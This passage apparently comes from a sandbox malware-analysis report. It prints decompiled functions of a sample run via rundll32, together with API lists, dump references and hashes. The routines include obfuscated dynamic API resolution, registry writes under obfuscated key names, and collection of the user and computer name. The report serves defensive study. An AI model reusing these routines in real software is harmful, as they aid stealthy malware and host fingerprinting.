                                          0x0408998b
                                          0x040899a1
                                          0x0408998d
                                          0x0408998d
                                          0x0408999a
                                          0x0408999a
                                          0x040899a5
                                          0x040899a7
                                          0x040899b1
                                          0x040899b6
                                          0x040899b6
                                          0x040899b1
                                          0x040899bd
                                          0x040899d3
                                          0x040899bf
                                          0x040899bf
                                          0x040899cc
                                          0x040899cc
                                          0x040899d7
                                          0x040899d9
                                          0x040899e3
                                          0x040899e8
                                          0x040899e8
                                          0x040899e3
                                          0x040899ef
                                          0x04089a05
                                          0x040899f1
                                          0x040899f1
                                          0x040899fe
                                          0x040899fe
                                          0x04089a09
                                          0x04089a0b
                                          0x04089a15
                                          0x04089a1a
                                          0x04089a1a
                                          0x04089a15
                                          0x04089a21
                                          0x04089a37
                                          0x04089a23
                                          0x04089a23
                                          0x04089a30
                                          0x04089a30
                                          0x04089a3b
                                          0x04089a3d
                                          0x04089a47
                                          0x04089a4c
                                          0x04089a4c
                                          0x04089a47
                                          0x04089a53
                                          0x04089a69
                                          0x04089a55
                                          0x04089a55
                                          0x04089a62
                                          0x04089a62
                                          0x04089a6d
                                          0x04089a6f
                                          0x04089a72
                                          0x04089a73
                                          0x04089a7a
                                          0x04089a7c
                                          0x04089a7d
                                          0x04089a7d
                                          0x04089a7a
                                          0x04089a84
                                          0x04089a9a
                                          0x04089a86
                                          0x04089a86
                                          0x04089a93
                                          0x04089a93
                                          0x04089a9e
                                          0x04089aac
                                          0x04089ab6
                                          0x04089ab6
                                          0x04089ac3
                                          0x04089acf
                                          0x04089acf

                                          APIs
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0408D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04084A8B), ref: 0408997B
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0408D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04084A8B), ref: 040899AD
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0408D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04084A8B), ref: 040899DF
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0408D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04084A8B), ref: 04089A11
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,0408D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04084A8B), ref: 04089A43
                                          • HeapFree.KERNEL32(00000000,?,00000005,0408D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04084A8B), ref: 04089AC3
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 0ec3c2c60f88d9be23753675f9f05d9a9a46db44324d83cb1fe1f5b25abbd25f
                                          • Instruction ID: 02b014d6398bd0210ae26e267ad3dab83c2e63b815ed49eb6f1665490424e0d5
                                          • Opcode Fuzzy Hash: 0ec3c2c60f88d9be23753675f9f05d9a9a46db44324d83cb1fe1f5b25abbd25f
                                          • Instruction Fuzzy Hash: 93516EB0700114EEE750FBB89F84DAB76EDEB987147640A2DA4C1F7144E679F9418A60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0408135B, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SysAllocString.OLEAUT32(00000000), ref: 040813B5
                                          • SysAllocString.OLEAUT32(0070006F), ref: 040813C9
                                          • SysAllocString.OLEAUT32(00000000), ref: 040813DB
                                          • SysFreeString.OLEAUT32(00000000), ref: 04081443
                                          • SysFreeString.OLEAUT32(00000000), ref: 04081452
                                          • SysFreeString.OLEAUT32(00000000), ref: 0408145D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: 16983a597ae934a4ab5a70cac69b04878deb591bad0a8b6fd74eb272c9f1c1ec
                                          • Instruction ID: e697ec745377577bc687691521485fbae6728c080a56222c017eebbe65abaca7
                                          • Opcode Fuzzy Hash: 16983a597ae934a4ab5a70cac69b04878deb591bad0a8b6fd74eb272c9f1c1ec
                                          • Instruction Fuzzy Hash: A1417F36900609AFDB41EFF8D944ADEB7BAEF49300F104429E954FB250DA75ED06CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 040857D8, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E040857D8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E040858BE(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x408d2a4; // 0xbfa5a8
					_t1 = _t23 + 0x408e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x408d2a4; // 0xbfa5a8
					_t2 = _t26 + 0x408e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E0408147E(_t54);
					} else {
						_t30 =  *0x408d2a4; // 0xbfa5a8
						_t5 = _t30 + 0x408e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x408d2a4; // 0xbfa5a8
							_t7 = _t33 + 0x408e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x408d2a4; // 0xbfa5a8
								_t9 = _t36 + 0x408e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x408d2a4; // 0xbfa5a8
									_t11 = _t39 + 0x408e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04087B01(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                          0x040857e7
                                          0x040857eb
                                          0x040858ad
                                          0x040857f1
                                          0x040857f1
                                          0x040857f6
                                          0x04085809
                                          0x0408580b
                                          0x04085810
                                          0x04085818
                                          0x0408581f
                                          0x04085821
                                          0x04085826
                                          0x040858a5
                                          0x040858a6
                                          0x04085828
                                          0x04085828
                                          0x0408582d
                                          0x04085835
                                          0x04085837
                                          0x0408583c
                                          0x00000000
                                          0x0408583e
                                          0x0408583e
                                          0x04085843
                                          0x0408584b
                                          0x0408584d
                                          0x04085852
                                          0x00000000
                                          0x04085854
                                          0x04085854
                                          0x04085859
                                          0x04085861
                                          0x04085863
                                          0x04085868
                                          0x00000000
                                          0x0408586a
                                          0x0408586a
                                          0x0408586f
                                          0x04085877
                                          0x04085879
                                          0x0408587e
                                          0x00000000
                                          0x04085880
                                          0x04085886
                                          0x0408588b
                                          0x04085892
                                          0x04085897
                                          0x0408589c
                                          0x00000000
                                          0x0408589e
                                          0x040858a1
                                          0x040858a1
                                          0x0408589c
                                          0x0408587e
                                          0x04085868
                                          0x04085852
                                          0x0408583c
                                          0x04085826
                                          0x040858bb

                                          APIs
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,040814AF,?,?,?,?,00000000,00000000), ref: 040857FD
                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 0408581F
                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04085835
                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 0408584B
                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04085861
                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04085877
                                            • Part of subcall function 04087B01: memset.NTDLL ref: 04087B80
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                          • String ID:
                                          • API String ID: 1886625739-0
                                          • Opcode ID: 66a0e717567886b575df735c8a557f5af207af322562a4be17013d9d7626ed60
                                          • Instruction ID: 280ec648e64658234e7ff31bfbc8fa0b652a08c9f0f7a6695d277f15c14736bd
                                          • Opcode Fuzzy Hash: 66a0e717567886b575df735c8a557f5af207af322562a4be17013d9d7626ed60
                                          • Instruction Fuzzy Hash: F9214FB060061AEFEB11EF69CE44D5A77EDEF54304704452EE988FB250EB78E9058B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0408A642, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 173stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E0408A642(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				void _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t96;
				void* _t97;
				int _t102;
				signed int* _t104;
				intOrPtr* _t105;
				void* _t106;

				_t97 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t102 = _a16;
				if(_t102 == 0) {
					__imp__( &_v284,  *0x408d33c);
					_t96 = 0x80000002;
					L6:
					_t60 = E0408A5E9(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t105 = _a24;
					if(E0408621D(_t97, _t105, _t96, _t60) != 0) {
						L27:
						E0408147E(_a8);
						goto L29;
					}
					_t65 =  *0x408d2a4; // 0xbfa5a8
					_t16 = _t65 + 0x408e8de; // 0x65696c43
					_t68 = E0408A5E9(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t105 + 0x14; // 0x102
						_t33 = _t105 + 0x10; // 0x3d0408c0
						if(E04084C9A( *_t33, _t96, _a8,  *0x408d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0x408d2a4; // 0xbfa5a8
							if(_t102 == 0) {
								_t35 = _t72 + 0x408ea54; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x408ea4f; // 0x55434b48
								_t73 = _t34;
							}
							if(E040830FC( &_a24, _t73,  *0x408d334,  *0x408d338,  &_a24,  &_a16) == 0) {
								if(_t102 == 0) {
									_t75 =  *0x408d2a4; // 0xbfa5a8
									_t44 = _t75 + 0x408e856; // 0x74666f53
									_t78 = E0408A5E9(0, _t44);
									_t103 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t105 + 0x10; // 0x3d0408c0
										E04081BC1( *_t47, _t96, _a8,  *0x408d338, _a24);
										_t49 = _t105 + 0x10; // 0x3d0408c0
										E04081BC1( *_t49, _t96, _t103,  *0x408d330, _a16);
										E0408147E(_t103);
									}
								} else {
									_t40 = _t105 + 0x10; // 0x3d0408c0
									E04081BC1( *_t40, _t96, _a8,  *0x408d338, _a24);
									_t43 = _t105 + 0x10; // 0x3d0408c0
									E04081BC1( *_t43, _t96, _a8,  *0x408d330, _a16);
								}
								if( *_t105 != 0) {
									E0408147E(_a24);
								} else {
									 *_t105 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t105 + 0x10; // 0x3d0408c0
					if(E040874B9( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t104 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t104 =  *_t104 & 0x00000000;
							_t26 = _t105 + 0x10; // 0x3d0408c0
							E04084C9A( *_t26, _t96, _a8, _a24, _t104);
						}
						E0408147E(_t104);
						_t102 = _a16;
					}
					E0408147E(_a24);
					goto L14;
				}
				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					memcpy( &_v284, _a8, _t102);
					__imp__(_t106 + _t102 - 0x117,  *0x408d33c);
					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
					_t96 = 0x80000003;
					goto L6;
				}
			}























                                          0x0408a642
                                          0x0408a64b
                                          0x0408a652
                                          0x0408a657
                                          0x0408a6c6
                                          0x0408a6cc
                                          0x0408a6d1
                                          0x0408a6da
                                          0x0408a6df
                                          0x0408a6e4
                                          0x0408a858
                                          0x0408a85f
                                          0x0408a85f
                                          0x0408a864
                                          0x0408a866
                                          0x0408a866
                                          0x0408a86f
                                          0x0408a86f
                                          0x0408a6ea
                                          0x0408a6f6
                                          0x0408a84e
                                          0x0408a851
                                          0x00000000
                                          0x0408a851
                                          0x0408a6fc
                                          0x0408a701
                                          0x0408a70a
                                          0x0408a70f
                                          0x0408a714
                                          0x0408a75e
                                          0x0408a75e
                                          0x0408a771
                                          0x0408a77b
                                          0x0408a781
                                          0x0408a788
                                          0x0408a792
                                          0x0408a792
                                          0x0408a78a
                                          0x0408a78a
                                          0x0408a78a
                                          0x0408a78a
                                          0x0408a7b4
                                          0x0408a7bc
                                          0x0408a7ea
                                          0x0408a7ef
                                          0x0408a7f8
                                          0x0408a7fd
                                          0x0408a801
                                          0x0408a833
                                          0x0408a803
                                          0x0408a810
                                          0x0408a813
                                          0x0408a823
                                          0x0408a826
                                          0x0408a82c
                                          0x0408a82c
                                          0x0408a7be
                                          0x0408a7cb
                                          0x0408a7ce
                                          0x0408a7e0
                                          0x0408a7e3
                                          0x0408a7e3
                                          0x0408a83d
                                          0x0408a849
                                          0x0408a83f
                                          0x0408a842
                                          0x0408a842
                                          0x0408a83d
                                          0x0408a7b4
                                          0x00000000
                                          0x0408a77b
                                          0x0408a723
                                          0x0408a72d
                                          0x0408a72f
                                          0x0408a734
                                          0x0408a738
                                          0x0408a73a
                                          0x0408a745
                                          0x0408a748
                                          0x0408a748
                                          0x0408a74e
                                          0x0408a753
                                          0x0408a753
                                          0x0408a759
                                          0x00000000
                                          0x0408a759
                                          0x0408a65c
                                          0x00000000
                                          0x0408a683
                                          0x0408a68e
                                          0x0408a6a4
                                          0x0408a6aa
                                          0x0408a6b2
                                          0x00000000
                                          0x0408a6b2

                                          APIs
                                          • StrChrA.SHLWAPI(0408553C,0000005F,00000000,00000000,00000104), ref: 0408A675
                                          • memcpy.NTDLL(?,0408553C,?), ref: 0408A68E
                                          • lstrcpy.KERNEL32(?), ref: 0408A6A4
                                            • Part of subcall function 0408A5E9: lstrlen.KERNEL32(?,00000000,0408D330,00000001,0408937A,0408D00C,0408D00C,00000000,00000005,00000000,00000000,?,?,?,0408207E,?), ref: 0408A5F2
                                            • Part of subcall function 0408A5E9: mbstowcs.NTDLL ref: 0408A619
                                            • Part of subcall function 0408A5E9: memset.NTDLL ref: 0408A62B
                                            • Part of subcall function 04081BC1: lstrlenW.KERNEL32(0408553C,?,?,0408A818,3D0408C0,80000002,0408553C,04089642,74666F53,4D4C4B48,04089642,?,3D0408C0,80000002,0408553C,?), ref: 04081BE1
                                            • Part of subcall function 0408147E: HeapFree.KERNEL32(00000000,00000000,04081D11,00000000,?,?,-00000008), ref: 0408148A
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0408A6C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                          • String ID: \
                                          • API String ID: 2598994505-2967466578
                                          • Opcode ID: 7d3af5178b6af9bbb077208a8fe91ef523619f9d6577fce85fa07c8df725a00d
                                          • Instruction ID: 73290d793008e6c9ba6bd477d350270772fb678f544895ba32ade6c1dfcdd36f
                                          • Opcode Fuzzy Hash: 7d3af5178b6af9bbb077208a8fe91ef523619f9d6577fce85fa07c8df725a00d
                                          • Instruction Fuzzy Hash: 27510B7160020AEBEF11BFA0DE40DDA7BB9EF04308F00852DB995B6550E739E9169F60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0408614A, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0408614A() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E040858BE(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E0408147E(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x4085210
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                          0x04086158
                                          0x0408615b
                                          0x0408615e
                                          0x04086164
                                          0x04086169
                                          0x0408616f
                                          0x04086177
                                          0x0408617a
                                          0x04086180
                                          0x04086185
                                          0x04086192
                                          0x0408619f
                                          0x040861a3
                                          0x040861a5
                                          0x040861a9
                                          0x040861ac
                                          0x040861bc
                                          0x0408620f
                                          0x04086210
                                          0x040861be
                                          0x040861c3
                                          0x040861c4
                                          0x040861c9
                                          0x040861cc
                                          0x040861df
                                          0x00000000
                                          0x040861e1
                                          0x040861e4
                                          0x040861e9
                                          0x040861f7
                                          0x040861fa
                                          0x04086200
                                          0x04086205
                                          0x00000000
                                          0x04086207
                                          0x04086207
                                          0x0408620a
                                          0x0408620a
                                          0x04086205
                                          0x040861df
                                          0x04086215
                                          0x04086216
                                          0x04086185
                                          0x0408621c

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,0408520E), ref: 0408615E
                                          • GetComputerNameW.KERNEL32(00000000,0408520E), ref: 0408617A
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                          • GetUserNameW.ADVAPI32(00000000,0408520E), ref: 040861B4
                                          • GetComputerNameW.KERNEL32(0408520E,?), ref: 040861D7
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,0408520E,00000000,04085210,00000000,00000000,?,?,0408520E), ref: 040861FA
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                          • String ID:
                                          • API String ID: 3850880919-0
                                          • Opcode ID: 4bdf8024d77980df9221f16dedd5d8c084ca5b0a1133dede221f8bc7b5a4b8e0
                                          • Instruction ID: d88f495a388dd9687509bb21ccafd21ab9dac45a4fb069577c33d55566cbc92c
                                          • Opcode Fuzzy Hash: 4bdf8024d77980df9221f16dedd5d8c084ca5b0a1133dede221f8bc7b5a4b8e0
                                          • Instruction Fuzzy Hash: B321C976900508FFDB11EFE4DA84DEEBBB8EE44344B1145AEE641F7240E634AB44DB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 040862CD, Relevance: 7.6, APIs: 5, Instructions: 75memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E040862CD(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t36;
				void* _t41;
				char* _t42;
				void* _t44;
				void* _t49;
				void* _t50;
				int _t51;
				int _t54;
				void* _t55;

				_t49 = _a4;
				_t55 = __eax;
				_v12 = 0xb;
				if(_t49 != 0 && __eax != 0) {
					_t5 = _t55 - 1; // -1
					_t42 = _t49 + _t5;
					_t28 =  *_t42;
					_v5 = _t28;
					 *_t42 = 0;
					__imp__(_a8, _t41);
					_v16 = _t28;
					_t50 =  *0x408d114(_t49, _a8);
					if(_t50 != 0) {
						 *_t42 = _v5;
						_t44 = RtlAllocateHeap( *0x408d238, 0, _a16 + __eax);
						if(_t44 == 0) {
							_v12 = 8;
						} else {
							_t51 = _t50 - _a4;
							memcpy(_t44, _a4, _t51);
							_t36 = memcpy(_t44 + _t51, _a12, _a16);
							_t45 = _v16;
							_t54 = _a16;
							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
							 *_a20 = _t44;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t55 - _v16 + _t54;
						}
					}
				}
				return _v12;
			}
















                                          0x040862d5
                                          0x040862d8
                                          0x040862da
                                          0x040862e3
                                          0x040862f5
                                          0x040862f5
                                          0x040862f9
                                          0x040862fb
                                          0x040862fe
                                          0x04086301
                                          0x0408630a
                                          0x04086314
                                          0x04086318
                                          0x0408631d
                                          0x04086333
                                          0x04086337
                                          0x04086388
                                          0x04086339
                                          0x04086339
                                          0x04086341
                                          0x04086350
                                          0x04086355
                                          0x04086365
                                          0x0408636b
                                          0x04086376
                                          0x04086380
                                          0x04086384
                                          0x04086384
                                          0x04086337
                                          0x0408638f
                                          0x04086396

                                          APIs
                                          • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 04086301
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0408632D
                                          • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 04086341
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 04086350
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 0408636B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 0f7c53498af1ca5e0ad3260472bfa74f16deaddc587d09daf329bc0dee54902d
                                          • Instruction ID: 12740e66667e1390ba82bbecda6a5ed2a28a4d237db2c160ca968898db4e85cd
                                          • Opcode Fuzzy Hash: 0f7c53498af1ca5e0ad3260472bfa74f16deaddc587d09daf329bc0dee54902d
                                          • Instruction Fuzzy Hash: ED219C36900209AFDF11AF68C944AEEBFB9EF85304F058158F884AB300D735A915CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04089FE7, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E04089FE7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E04086B6E(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E0408A96C(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x408d12c() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                          0x04089fe7
                                          0x04089ff4
                                          0x04089ff6
                                          0x0408a059
                                          0x00000000
                                          0x0408a059
                                          0x0408a00e
                                          0x0408a015
                                          0x0408a021
                                          0x0408a026
                                          0x0408a028
                                          0x0408a02a
                                          0x0408a02c
                                          0x0408a02e
                                          0x0408a030
                                          0x0408a03c
                                          0x0408a04c
                                          0x00000000
                                          0x0408a03e
                                          0x0408a03e
                                          0x0408a045
                                          0x0408a052
                                          0x0408a052
                                          0x0408a052
                                          0x0408a045
                                          0x0408a03c
                                          0x0408a057
                                          0x00000000
                                          0x00000000
                                          0x0408a05d

                                          APIs
                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,040866AF,?,?,00000000,00000000), ref: 0408A021
                                          • ResetEvent.KERNEL32(?), ref: 0408A026
                                          • GetLastError.KERNEL32 ref: 0408A03E
                                          • GetLastError.KERNEL32(?,?,00000102,040866AF,?,?,00000000,00000000), ref: 0408A059
                                            • Part of subcall function 04086B6E: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,0408A006,?,?,?,?,00000102,040866AF,?,?,00000000), ref: 04086B7A
                                            • Part of subcall function 04086B6E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0408A006,?,?,?,?,00000102,040866AF,?), ref: 04086BD8
                                            • Part of subcall function 04086B6E: lstrcpy.KERNEL32(00000000,00000000), ref: 04086BE8
                                          • SetEvent.KERNEL32(?), ref: 0408A04C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp Download File
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp Download File
